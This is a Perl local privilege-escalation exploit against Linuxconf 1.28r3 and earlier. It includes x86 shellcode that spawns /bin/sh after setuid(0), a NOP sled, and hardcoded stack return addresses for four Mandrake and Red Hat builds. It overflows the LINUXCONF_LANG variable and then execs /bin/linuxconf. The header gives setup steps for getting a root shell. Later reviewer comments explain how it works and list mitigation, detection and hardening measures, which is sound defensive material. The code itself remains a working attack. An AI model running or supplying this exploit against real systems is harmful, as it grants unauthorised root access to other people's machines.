#!/usr/bin/perl
####################################################################################
#Priv8 Labs Linuxconf version 1.28r3 and < local r00t exploit by wsxz.
#
# Before run this exploit do this things!!
# 1- mkdir LINUXCONF_LANG.eng
# 2- touch LINUXCONF_LANG.eng/LINUXCONF_LANG.eng
# 3- run the exploit and get your root shell ;)
#
# Greetz: coideloko, chroot-, xtc , lkm, M|ght, overkill, blood_sucker, execk, printf
# friends of Priv8 security.
#
#
####################################################################################
#
# NOTE(review): reading guide for defenders.
#
# What the script visibly does: it builds one long string (NOP padding, a
# machine-code payload, more NOP padding, then repeated 32-bit addresses),
# stores it in the LINUXCONF_LANG environment variable and exec()s
# /bin/linuxconf. The vulnerable code is not on this page; the layout implies
# that linuxconf copies LINUXCONF_LANG into a fixed-size stack buffer without a
# length check, and that the binary runs with elevated privileges (presumably
# setuid root, since the header calls this a local root exploit). Confirm both
# against the installed binary.
#
# Mitigation: remove the setuid bit from linuxconf, or uninstall it where it is
# not needed, and move to a vendor-fixed release (the header lists 1.28r3 and
# earlier as affected).
#
# Detection: an exec of /bin/linuxconf whose LINUXCONF_LANG value is roughly
# 2100 bytes long and contains long runs of 0x90 bytes; a user-created
# directory LINUXCONF_LANG.eng holding a file of the same name (steps 1-2 of
# the header).
#
# Hardening: the per-target 0xbfff.... values below are fixed stack addresses,
# so the script as written depends on a predictable stack location and an
# executable stack. Stack address randomisation and non-executable stack
# memory invalidate those values.

# Machine-code payload for x86 (see the NOP comment further down). The author's
# inline comments label the first two fragments setuid(0) and setgid(0); the
# final fragment ends in the literal path /bin/sh.
$shellcode =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80".#setuid 0
"\x31\xdb\x89\xd8\xb0\x2e\xcd\x80".#setgid 0
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89".
"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c".
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff".
"\xff\xff/bin/sh";

$nop = "\x90"; # x86 NOP
$offset = 0; # Default offset to try.

# Command line: the first argument selects a row of the target table below, the
# optional second argument is added to that row's stack address.
if (@ARGV == 1 || @ARGV == 2) {
    $target = $ARGV[0];
    $offset = $ARGV[1];
}else{
    # Any other argument count: print the usage text and the target list, then
    # exit with status 1.
    printf("!!! Priv8 Labs Linuxconf local root exploit by wsxz !!!\n");
    # The next string literal spans a line break exactly as the page has it
    # (possibly a wrap introduced when the page was captured).
    printf("!!! 
usage: priv8lc.pl target !!!\n");
    printf("List of targets:\n");
    printf(" 1 - Linux Mandrake 8.2 Linuxconf 1.27\n");
    printf(" 2 - Linux Mandrake 8.1 Linuxconf 1.26\n");
    printf(" 3 - Linux Mandrake 8.0 Linuxconf 1.25 (subrev 3) \n");
    printf(" 4 - Linux Redhat 7.3 Linuxconf 1.28 (subrev 1)\n");
    exit(1);
}

# Per-target constants, one block per distribution/version pair listed in the
# usage text:
#   $retshell - stack address (0xbfff....) plus the caller-supplied offset; it
#               is printed below as the "ret shellcode" value.
#   $retword  - an address in the 0x0811.... range, repeated around $retshell
#               in the buffer; its role is not explained on the page.
#   $aword    - how many copies of $retword precede $retshell (10 in every row).
# These values are tied to specific builds, so they double as a list of the
# builds this script was written for.
if ( $target eq "1" ) {
    $retword = 0x08117097;
    $retshell = 0xbfffd050 + $offset;
    $aword = 10;
}

if ( $target eq "2" ) {
    $retword = 0x081184b7;
    $retshell = 0xbfffe6b4 + $offset;
    $aword = 10;
}

if ( $target eq "3" ) {
    $retword = 0x08114e9e;
    $retshell = 0xbfffcbf4 + $offset;
    $aword = 10;
}

if ( $target eq "4" ) {
    $retword = 0x08117f5e;
    $retshell = 0xbfffcc3c + $offset;
    $aword = 10;
}

printf("Using target number %d\n", $target);
printf("Using ret shellcode 0x%x\n",$retshell);
printf("Using ret word 0x%x\n",$retword);

# pack('l') turns each address into a 4-byte value in the byte order of the
# machine running the script.
$new_retword = pack('l', ($retword));
$new_retshell = pack('l', ($retshell));

#Make the buffer
# Layout, in order: 900 NOP bytes, the payload, 975 NOP bytes, $aword copies of
# $retword, one copy of $retshell, 30 more copies of $retword.
$buffer2 = $nop x 900;
$buffer2 .= $shellcode;
$buffer2 .=$nop x 975;
$buffer2 .= $new_retword x $aword;
$buffer2 .= $new_retshell;
$buffer2 .= $new_retword x 30;

# Put the buffer into LINUXCONF_LANG, then replace this Perl process with
# /bin/linuxconf, which inherits the modified environment.
local($ENV{'LINUXCONF_LANG'}) = $buffer2;
exec("/bin/linuxconf");